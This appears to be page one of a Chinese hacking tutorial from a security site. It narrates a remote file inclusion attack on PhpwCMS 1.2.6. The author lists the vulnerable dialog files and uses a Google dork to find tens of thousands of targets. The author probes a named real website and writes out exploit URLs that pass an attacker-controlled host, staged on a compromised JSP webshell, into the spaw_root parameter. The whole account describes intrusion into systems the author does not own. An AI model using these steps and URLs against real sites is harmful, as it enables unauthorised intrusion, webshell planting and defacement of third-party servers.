黑客如何利用文件包含漏洞进行网站入侵

• 　　一、看见漏洞公告

  　　最近想学习一下文件包含漏洞，在无意中看见了关于文件包含的漏洞公告。大致的意思是这样的，PhpwCMS 1.2.6系统的下列文件存在文件包含漏洞：include/inc_ext/spaw/dialogs/table.php

  　　include/inc_ext/spaw/dialogs/a.php

  　　include/inc_ext/spaw/dialogs/colorpicker.php

  　　include/inc_ext/spaw/dialogs/confirm.php

  　　include/inc_ext/spaw/dialogs/img.php

  　　include/inc_ext/spaw/dialogs/img_library.php

  　　include/inc_ext/spaw/dialogs/td.php

  　　文件中的$spaw_root的没有过滤的情况下，包含'**class/lang.class.php'。具体的代码公告中没给出来。可以利用下面的url利用此漏洞，http://website1/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://website2/，其中website1是有漏洞的网站，website2是攻击的网站，website2所在的目录下有class/lang.class.php文件。

  　　二、学习的第一天

  　　马上行动，我用google搜索inurl:"phpwcms/index.php?id="，搜索到54,800多项结果，基本上都是国外的。看来这次发了，这次国外的wenshell肯定是一大堆了。呵呵……，嘿嘿……随便点击一个网站，是美国的：http://arena-sv.jans-webdesign.com，不知道这个网站有没有漏洞。我用http://arena-sv.jans-webdesign.com/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.baidu.com/检测，当然http://www.baidu.com/class/lang.class.php是不存在的，这时页面显示如图一所示，提示没有找到页面。这表明了这个网站存在文件包含漏洞，象这样的有漏洞的网站随便点击一个就是。

  　　检测出有文件包含漏洞

  　　现在开始利用这个漏洞，在我的支持asp网站根目录建一个class的目录，在class里面建lang.class.php文件。但是当我用浏览器浏览http://www.xxxx.xx/class/lang.class.php的时候，提示找不到文件。难道是我的网站所在的服务器没设置好吗?我试着找到了几个webshell，浏览的时候还是出现找不到文件的问题。

  　　郁闷啊……如果能建一个txt文件代替class/lang.class.php 多好啊。我问了我们工作组的学linux的同学，他们说可以用问号优化。但是偶不会啊，听上去很复杂的，等明天再来做吧，休息，休息。

  　　三、学习的第二天

  　　去搜索的发现有漏洞的网站变得比较少了，大部分的网站都被漏洞补了，还有一部分美国的网站上被挂了一些与反战争有关的图片或者一些国旗。还好的是昨天的哪个网站没有被人家黑掉，还有机会学习。我在无意中得到了jsp的wenshell，试着写了一个php文件，在浏览器浏览的时候出现的是源文件。看来现在现在可以利用这个jsp的webshell来作跳板。

  　　在webshell里面建一个class的文件夹，然后在class目录里面上传一个lang.class.php空文件，在文件里面写上.在浏览器上浏览http://..../gate/download.jsp?file=/opt/oracle/product/10gbi/j2ee/gate/applications/gate/gate/gate/class/lang.class.php, 显示的就是, 然后提交http://arena-sv.jans-webdesign.com/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://..../gate/download.jsp?file=%2Fopt%2Foracle%2Fproduct%2F10gbi%2Fj2ee%2Fgate%2Fapplications%2Fgate%2Fgate%2Fgate%2F,%2F是/的意思。

• [1] [2] 下一页 
• 复制本页网址和标题，发送给你QQ/Msn的好友一起分享
  
  
• 黑客如何利用文件包含漏洞进行网站入侵 相关文章：
• ·惠普82款笔记本存在严重网络安全漏洞
• ·黑客如何利用文件包含漏洞进行网站入侵
• ·简单分析2007年11月十大网络安全漏洞
• ·简单分析Script脚本跨站攻击漏洞技术
• ·系统漏洞的形成和防治办法
• ·KV网络版技术升级 离线管理全网漏洞
• ·用Nmap为Windows网络找漏洞
• ·QuickTime最新漏洞 Windows用户最危险
• ·微软11月2个补丁修补Windows漏洞
• ·Windows 2000中的加密技术被发现漏洞
• 黑客如何利用文件包含漏洞进行网站入侵 相关软件
• ·澎湃 番茄花园漏洞补丁 bat&reg 漏洞比病毒可怕
• ·宁夏大学 澎湃 番茄花园v2.9漏洞补丁 bat&reg 极品
• ·澎湃 番茄花园v2.9漏洞补丁 bat&reg 一定查看
• ·金山毒霸漏洞修复2007 (漏洞库2006.11.15.2)
• ·瑞星系统安全漏洞扫描器V1.0 Build 1111 绿色版
• ·动感下载的上传漏洞+提升权限
• ·利用落日整站上传漏洞
• ·vBulletin ''faq.php''脚本路径泄露漏洞
• ·最新的JPG图片漏洞演示动画
• ·CPB1.3论坛漏洞

上一篇:Linux和Windows系统升级的最大不同

下一篇:还原Windows Vista所有被隐藏更新及信息

• 特别声明：本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载，但请务必注明出处和原始作
• 者.文章版权归文章原始作者所有.对于被本站转载文章的个人和网站，我们表示深深的谢意。如果本站转
• 载的文章有版权问题请联系编辑人员,我们尽快予以更正. 转载请注明来源：http://www.hackhome.com

精品推荐

热点TOP10

特别推荐